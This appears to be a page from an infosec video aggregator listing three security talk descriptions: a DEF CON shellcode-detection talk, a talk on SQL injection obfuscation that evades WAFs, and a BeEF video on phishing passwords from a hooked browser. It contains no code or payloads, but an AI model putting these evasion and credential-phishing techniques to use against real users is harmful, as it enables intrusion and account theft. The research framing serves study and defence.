Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network Description: One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that the mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize capabilities of shellcode detection algorithms developed over recent ten years into optimal classifiers. The proposed approach allows us to reduce the total fp rate almost to 0, provides full coverage of shellcode classes detected by individual classifiers and significantly increases total throughput of detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia shows that hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than linear combination of classifiers, and almost 1.5 times faster for shellcode only datasets. Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF team which shows the following results in recent years: 2nd place in Deutsche Post Security Cup 2010, 6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011, 4th place in the final of ruCTF 2011 (and 1st at qualification), etc. Svetlana works at Redsecure project (experimental IDS/IPS) at Moscow State University. Her primary interests are network worms propagation detection and filtering, shellcode detection, static and runtime analysis of malware. Twitter:@SadieSV lvk.cs.msu.su/~sadie Dennis Gamayunov holds a PhD and works as Senior Researcher at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network security research group in MSU, project lead of the experimental event-driven and natively multicore Redsecure IDS/IPS, founder of Bushwhackers CTF team, with primary research and practical interests in network level malcode detection, high-speed traffic processing (including FPGA-based), and OS security with fine-grained privilege separation, SELinux and beyond. Twitter: @jamadharma http://redsecure.ru/team/denis-gamayunov PDF : - https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/DEFCON-20-Svetlana-Gaivoronski-Demorpheus.pdf Extra : - https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/Extras.zip Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network

New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli Description: SQLi remains a popular sport in the security arms-race. However, after analysis of hundreds of thousands of real world SQLi attacks, output from SQLi scanners, published reports, analysis of WAF source code, and database vendor documentation, both SQLi attackers and defenders have missed a few opportunities. This talk will iterate through the dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for regular-expression based WAFs. This will point the way for new directions in SQLi research for both offense and defense. Nick Galbreath is a director of engineering at Etsy, overseeing groups handling fraud, security, authentication and internal tools. Over the last 18 years, Nick has held leadership positions in number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has consulted for many more. He is the author of "Cryptography for Internet and Database Applications" (Wiley), and was awarded a number of patents in the area of social networking. He holds a master's degree in mathematics from Boston University. Twitter: @ngalbreath client9 https://github.com/client9 PDF : - https://media.defcon.org/dc-20/presentations/Galbreath/DEFCON-20-Galbreath-SQLi-Obfuscation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli

Beef Framework Petty Theft Description: In this video i will show you how to perform social engineering after hooking the browser. Lets see if you made a website that website need a logging credential so in between you can use your Technic and use some social engineering to steal Facebook or any other password using your custom logos. This video is all about phishing using BeEF Browser Exploitation Framework. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef Framework Petty Theft